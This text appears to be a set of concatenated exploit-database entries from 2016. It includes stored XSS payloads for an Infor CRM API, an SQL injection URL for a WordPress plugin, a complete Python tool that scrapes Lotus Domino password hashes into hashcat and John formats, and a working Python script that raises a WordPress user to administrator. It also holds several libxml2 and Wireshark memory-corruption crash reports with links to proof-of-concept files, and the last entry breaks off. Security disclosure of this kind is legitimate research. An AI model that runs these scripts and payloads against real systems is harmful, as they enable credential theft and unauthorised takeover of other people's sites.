createDate: "/Date(1456359095000)/"
createUser: "UUSERA0005W0"
dataType: "R"
defectId: null
description: "<img src=j onerror=confirm(document.cookie) >"
details: {createSource: null}
documentType: null
fileExists: true
fileName: "inforcrm_xss.png"
fileSize: 101722
historyId: null
leadId: null
modifyDate: "/Date(1456359095000)/"
modifyUser: "UUSERA0005W0"
opportunityId: null
physicalFileName: "!eUSERA0004IXinforcrm_xss.png"
productId: null
remoteStatus: null
returnId: null
salesOrderId: null
ticketId: null
url: null
user: {$key: "UUSERA0005W0"}
-----------------------------------------------------------
Affected parameter(s): Description, Location, and LongNotes
-----------------------------------------------------------
POST /SLXClient/slxdata.ashx/slx/system/-/activities?format=json&_t=1456357736977 HTTP/1.1
Host: intranet.zeroscience.mk
{$httpStatus: 200, $descriptor: "", ActivityBasedOn: null, Alarm: false,…}
$descriptor: ""
$httpStatus: 200
AccountId: null
AccountName: null
ActivityAttendees: {}
ActivityBasedOn: null
Alarm: false
AlarmTime: "2016-01-24T22:45:00Z"
AllowAdd: true
AllowComplete: true
AllowDelete: true
AllowEdit: true
AllowSync: true
AppId: null
Attachment: false
AttachmentCount: null
AttendeeCount: 0
Category: "Pleasantville"
ContactId: null
ContactName: null
CreateDate: "/Date(-62135596800000)/"
CreateUser: null
Description: "<img src=zsl onerror=prompt(1) >"
Details: {ForeignId1: null, ForeignId2: null, ForeignId3: null, ForeignId4: null, ProjectId: null,…}
ChangeKey: null
CreateSource: null
ForeignId1: null
ForeignId2: null
ForeignId3: null
ForeignId4: null
GlobalSyncId: null
ProjectId: null
Tick: null
UserDef1: null
UserDef2: null
UserDef3: null
Duration: "0"
EndDate: "/Date(1456359315286)/"
LeadId: null
LeadName: null
Leader: {$key: "UUSERA0005W0", $descriptor: "Userovich, User"}
$descriptor: "Userovich, User"
$key: "UUSERA0005W0"
Location: "<img src=zsl onerror=prompt(2) >"
LongNotes: "<img src=zsl onerror=prompt(3) >"
ModifyDate: "/Date(-62135596800000)/"
ModifyUser: null
Notes: "Zero Science Lab"
OpportunityId: null
OpportunityName: null
OriginalDate: "/Date(1456358415286)/"
PhoneNumber: null
Priority: "1"
ProcessId: null
ProcessNode: null
RecurIterations: 0
RecurPeriod: 0
RecurPeriodSpec: 0
RecurSkip: null
RecurrenceState: "rsNotRecurring"
Recurring: false
Resources: {}
Rollover: false
StartDate: "2016-01-25T00:00:05Z"
TicketId: null
TicketNumber: null
Timeless: true
Type: "atToDo"
UserActivities: {}
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userActivities?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"
UserNotifications: {}
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userNotifications?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"
========
Ocim MP3 Plugin SQL Injection Vulnerability
========
:----------------------------------------------------------------------------------------------------:
: # Exploit Title : Ocim MP3 Plugin SQL Injection Vulnerability
: # Date : 26 February 2016
: # Author : xevil and Blankon33
: # Vendor Site: http://www.ocimscripts.com/
: # Version:
: # Vulnerability : SQL Injection
: # Tested on : Wordpress 4.4.2
: # Severity : High
:----------------------------------------------------------------------------------------------------:
Summary
========
Ocim MP3 is Plugin to make MP3 Grabber site based on Wordpress.
Proof of Concept
========
Infected URL:
http://[Site]/[Path]/wp-content/plugins/ocim-mp3/source/pages.php?id=['SQLi]
Admin Panel:
http://[Site]/[Path]/oc-login.php
===========
Thanks to
===========
All Indonesian Hacker!!!
# Exploit Title: IBM Lotus Domino <= R8 Password Hash Extraction Exploit
# Google Dork: inurl:names.nsf?opendatabase
# Date: 02-24-2016
# Exploit Author: Jonathan Broche
# Contact: https://twitter.com/g0jhonny
# Vendor Homepage: https://www-01.ibm.com/software/lotus/category/messaging/
# Tested on: Lotus Domino 8.5
# CVE : CVE-2005-2428
1. Description
IBM Domino Databases contain a configuration issue allowing users to obtain password hashes, configuraiton information and more from the Public Address Book (i.e., names.nsf database). Password hashes are obtained from the hidden HTML HTTPPassword and dspHTTPPassword fields per user in the database.
2. Proof of Concept
#!/usr/bin/env python2
import requests, re, BeautifulSoup, sys, argparse, os
requests.packages.urllib3.disable_warnings()
parser = argparse.ArgumentParser(description='Domino Effect - A Lotus Domino password hash tool by Jonathan Broche (@g0jhonny)', version="1.0")
parser.add_argument('system', help="IP address or hostname to harvest hashes from. ")
parser.add_argument('-u', '--uri', metavar='path', default="/names.nsf", help="Path to the names.nsf file. [Default: /names.nsf]")
outgroup = parser.add_argument_group(title="Output Options")
outgroup.add_argument('--hashcat', action='store_true', help="Print results for use with hashcat.")
outgroup.add_argument('--john', action='store_true', help="Print results for use with John the Ripper.")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
print "\nDomino Effect {}\n".format(parser.version)
headers={'User-Agent':'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3'}
try:
response = requests.get("https://{}{}/People?OpenView".format(args.system, args.uri), verify=False, headers=headers, timeout=3)
except requests.exceptions.Timeout as e:
print "[!] Timed out, try again."
sys.exit(1)
except Exception as e:
print e
soup = BeautifulSoup.BeautifulSoup(response.text)
links = []
#grab all user profile links
for link in soup.findAll('a'):
if "OpenDocument" in link['href']:
if link['href'] not in links:
links.append(link['href'])
hashes = {}
for link in links: #get user profile
try:
response = requests.get("https://{}{}".format(args.system, link), verify=False, headers=headers, timeout=2)
except requests.exceptions.Timeout as e:
pass
except Exception as e:
print e
if response.text:
soup = BeautifulSoup.BeautifulSoup(response.text)
name = soup.find('input', {'name' : '$dspShortName'}).get('value').strip() #short name
httppassword = soup.find('input', { "name" : "HTTPPassword"}).get('value').strip()
dsphttppassword = soup.find('input', { "name" : "dspHTTPPassword"}).get('value').strip()
if httppassword and httppassword not in hashes.keys():
hashes[httppassword] = name
elif dsphttppassword and dsphttppassword not in hashes.keys():
hashes[dsphttppassword] = name
if hashes: #output
if args.hashcat or args.john:
if args.hashcat:
for h in hashes.keys():
print h
if args.john:
for h, n in hashes.items():
print "{}:{}".format(n,h)
else:
for h, n in hashes.items():
print "[*] User: {} Hash: {}".format(n, h)
print "\n{} hashes obtained\n".format(len(hashes))
3. Solution
To hide the HTTP password from the HTML source:
1) Open the $PersonalInheritableSchema subform (In the designer under Shared Code, Subforms).
2) Find the fields: $dspHTTPPassword and HTTPPassword.
3) In the field properties for both fields, on the hide tab under "Hide paragram from" check off "Web browsers".
4) Open the Person form (Under Forms).
5) In the form properties, on the 2nd tab, disable the option "Generate HTML for all fields".
In addition, ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other senstive files.
Source: https://code.google.com/p/google-security-research/issues/detail?id=636
The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint --html /path/to/file"):
--- cut ---
==26202==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100001c900 at pc 0x0000008073f9 bp 0x7ffd791c7f90 sp 0x7ffd791c7f88
READ of size 1 at 0x62100001c900 thread T0
#0 0x8073f8 in htmlCurrentChar libxml2-2.9.3/HTMLparser.c:439:6
#1 0x80ee62 in htmlParseCharDataInternal libxml2-2.9.3/HTMLparser.c:3011:8
#2 0x821b85 in htmlParseCharData libxml2-2.9.3/HTMLparser.c:3061:5
#3 0x7df875 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4634:3
#4 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
#5 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
#6 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
#7 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
#8 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
0x62100001c900 is located 0 bytes to the right of 4096-byte region [0x62100001b900,0x62100001c900)
allocated by thread T0 here:
#0 0x4b8b68 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0xa01a0c in xmlBufCreate libxml2-2.9.3/buf.c:137:32
#2 0x550aca in xmlSwitchInputEncodingInt libxml2-2.9.3/parserInternals.c:1205:34
#3 0x54f5ce in xmlSwitchToEncodingInt libxml2-2.9.3/parserInternals.c:1281:12
#4 0x54f278 in xmlSwitchEncoding libxml2-2.9.3/parserInternals.c:1101:11
#5 0x808eea in htmlCurrentChar libxml2-2.9.3/HTMLparser.c:518:13
#6 0x804a38 in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2496:9
#7 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
#8 0x7ec211 in htmlParseDocTypeDecl libxml2-2.9.3/HTMLparser.c:3424:12
#9 0x7debf4 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4585:3
#10 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
#11 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
#12 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
#13 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
#14 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/HTMLparser.c:439:6 in htmlCurrentChar
Shadow bytes around the buggy address:
0x0c427fffb8d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffb8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffb8f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffb900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffb910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c427fffb920:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==26202==ABORTING
--- cut ---
The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758606. Attached is an XML file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39494.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=639
The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint /path/to/file"):
--- cut ---
==4210==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6290000051ff at pc 0x000000533c8f bp 0x7ffdb38c4830 sp 0x7ffdb38c4828
READ of size 1 at 0x6290000051ff thread T0
#0 0x533c8e in xmlParserPrintFileContextInternal libxml2-2.9.3/error.c:192:6
#1 0x54088a in xmlReportError libxml2-2.9.3/error.c:406:9
#2 0x53884f in __xmlRaiseError libxml2-2.9.3/error.c:633:2
#3 0x56f0ec in xmlFatalErr libxml2-2.9.3/parser.c:540:5
#4 0x569c98 in xmlGROW libxml2-2.9.3/parser.c:2077:9
#5 0x62bcb3 in xmlParseEndTag2 libxml2-2.9.3/parser.c:9846:5
#6 0x61d620 in xmlParseElement libxml2-2.9.3/parser.c:10238:2
#7 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
#8 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
#9 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
#10 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
#11 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
0x6290000051ff is located 1 bytes to the left of 16384-byte region [0x629000005200,0x629000009200)
allocated by thread T0 here:
#0 0x4b8b68 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f4df5219729 (/lib/x86_64-linux-gnu/libz.so.1+0xf729)
SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/error.c:192:6 in xmlParserPrintFileContextInternal
Shadow bytes around the buggy address:
0x0c527fff89e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff89f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8a10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8a20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c527fff8a30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
0x0c527fff8a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c527fff8a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c527fff8a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c527fff8a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c527fff8a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==4210==ABORTING
--- cut ---
The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758588. Attached is an XML file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39493.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=638
The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint /path/to/file"):
--- cut ---
==4588==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6290000049e6 at pc 0x00000062b643 bp 0x7ffffa00f570 sp 0x7ffffa00f568
READ of size 1 at 0x6290000049e6 thread T0
#0 0x62b642 in xmlParseEndTag2 libxml2-2.9.3/parser.c:9828:13
#1 0x61d620 in xmlParseElement libxml2-2.9.3/parser.c:10238:2
#2 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#3 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#4 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#5 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#6 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
#7 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
#8 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
#9 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
#10 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
0x6290000049e6 is located 2018 bytes to the right of 16388-byte region [0x629000000200,0x629000004204)
allocated by thread T0 here:
#0 0x4b8ef0 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
#1 0xa079a5 in xmlBufGrowInternal libxml2-2.9.3/buf.c:486:23
#2 0xa06722 in xmlBufGrow libxml2-2.9.3/buf.c:515:11
#3 0x72fef4 in xmlParserInputBufferGrow libxml2-2.9.3/xmlIO.c:3326:9
#4 0x543b22 in xmlParserInputGrow libxml2-2.9.3/parserInternals.c:320:8
#5 0x569d10 in xmlGROW libxml2-2.9.3/parser.c:2081:5
#6 0x68208d in xmlParseNCNameComplex libxml2-2.9.3/parser.c:3499:6
#7 0x68136d in xmlParseNCName libxml2-2.9.3/parser.c:3591:12
#8 0x67d282 in xmlParseQName libxml2-2.9.3/parser.c:8859:9
#9 0x61f04d in xmlParseStartTag2 libxml2-2.9.3/parser.c:9381:17
#10 0x61a626 in xmlParseElement libxml2-2.9.3/parser.c:10129:16
#11 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#12 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#13 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#14 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#15 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
#16 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
#17 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
#18 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
#19 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/parser.c:9828:13 in xmlParseEndTag2
Shadow bytes around the buggy address:
0x0c527fff88e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff88f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c527fff8930: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa
0x0c527fff8940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==4588==ABORTING
--- cut ---
The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758589. Attached is an XML file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39492.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=637
The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint --html /path/to/file"):
--- cut ---
==25920==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x631000010810 at pc 0x0000004a2f25 bp 0x7ffc81805ae0 sp 0x7ffc81805290
READ of size 73661 at 0x631000010810 thread T0
#0 0x4a2f24 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0xd026b2 in xmlDictAddString libxml2-2.9.3/dict.c:285:5
#2 0xd009e8 in xmlDictLookup libxml2-2.9.3/dict.c:926:11
#3 0x806e4d in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2517:12
#4 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
#5 0x7ca6f1 in htmlParseEntityRef libxml2-2.9.3/HTMLparser.c:2682:16
#6 0x820a0d in htmlParseReference libxml2-2.9.3/HTMLparser.c:4044:8
#7 0x7df716 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4619:3
#8 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
#9 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
#10 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
#11 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
#12 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
0x631000010810 is located 0 bytes to the right of 65552-byte region [0x631000000800,0x631000010810)
allocated by thread T0 here:
#0 0x4b8ef0 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
#1 0xa079a5 in xmlBufGrowInternal libxml2-2.9.3/buf.c:486:23
#2 0xa06722 in xmlBufGrow libxml2-2.9.3/buf.c:515:11
#3 0x72fef4 in xmlParserInputBufferGrow libxml2-2.9.3/xmlIO.c:3326:9
#4 0x543b22 in xmlParserInputGrow libxml2-2.9.3/parserInternals.c:320:8
#5 0x8067f4 in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2511:6
#6 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
#7 0x7ca6f1 in htmlParseEntityRef libxml2-2.9.3/HTMLparser.c:2682:16
#8 0x820a0d in htmlParseReference libxml2-2.9.3/HTMLparser.c:4044:8
#9 0x7df716 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4619:3
#10 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
#11 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
#12 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
#13 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
#14 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c627fffa0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c627fffa100: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==25920==ABORTING
--- cut ---
The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758605. Attached is an XML file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39491.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=647
The following crash due to a heap-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==5869==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001e95c at pc 0x0000004c1386 bp 0x7fff8c82cbf0 sp 0x7fff8c82c3a0
WRITE of size 1425 at 0x61b00001e95c thread T0
#0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0x9c8ab0 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1614:5
#2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20
#3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10
#4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#6 0x52c1df in main wireshark/tshark.c:2197:13
0x61b00001e95c is located 0 bytes to the right of 1500-byte region [0x61b00001e380,0x61b00001e95c)
allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f1f907a8610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x83fff6 in wtap_open_offline wireshark/wiretap/file_access.c:1105:2
#3 0x53214d in cf_open wireshark/tshark.c:4195:9
#4 0x52bc7e in main wireshark/tshark.c:2188:9
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c367fffbcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffbd20: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
0x0c367fffbd30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbd50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5869==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11795. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39490.zip
"""
* Exploit Title: Extra User Details [Privilege Escalation]
* Discovery Date: 2016-02-13
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://vadimk.com/
* Software Link: https://wordpress.org/plugins/extra-user-details/
* Version: 0.4.2
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress
Description
-----------
_Extra User Details_ plugin for WordPress suffers from a Privilege
Escalation
vulnerability.
The plugin hooks the `eud_update_ExtraFields` function to `profile_update`
WordPress action. This function doesn't properly check user capabilities
and
updates all meta information passed to post data. The only condition is
that
the post variable name has the `eud` prefix which is striped before
updating
the values in DB.
An attacker can exploit this misbehavior to update the
{prefix}\_capabilities
meta information to gain administrative privileges.
PoC
---
In the following PoC we assume that the database has the `wp` prefix, a
very
common scenario as this is the default WordPress value
"""
# !/usr/bin/python3
################################################################################
# Extra User Details Privilege Escalation Exploit
#
# Author: Panagiotis Vagenas <pan.vagenas>
#
# Dependencies: BeautifulSoup
(http://www.crummy.com/software/BeautifulSoup/)
################################################################################
import requests
from bs4 import BeautifulSoup
baseUrl = 'http://example.com'
loginUrl = baseUrl + '/wp-login.php'
profileUrl = baseUrl + '/wp-admin/profile.php'
loginPostData = {
'log': 'username',
'pwd': 'password',
'rememberme': 'forever',
'wp-submit': 'Log+In'
}
s = requests.Session()
r = s.post(loginUrl, loginPostData)
if r.status_code != 200:
print('Login error')
exit(1)
r = s.get(profileUrl)
soup = BeautifulSoup(r.text, 'html.parser')
f = soup.find('form', {'id': 'your-profile'})
if not f:
print('Error')
exit(1)
data = {
'eudwp_capabilities[administrator]': 1,
}
for i in f.find_all('input'):
if 'name' in i.attrs and 'value' in i.attrs and i.attrs['value']:
data[i.attrs['name']] = i.attrs['value']
r = s.post(profileUrl, data)
if r.status_code == 200:
print('Success')
exit(0)
"""
Solution
--------
Upgrade to v0.4.2.1
Timeline
--------
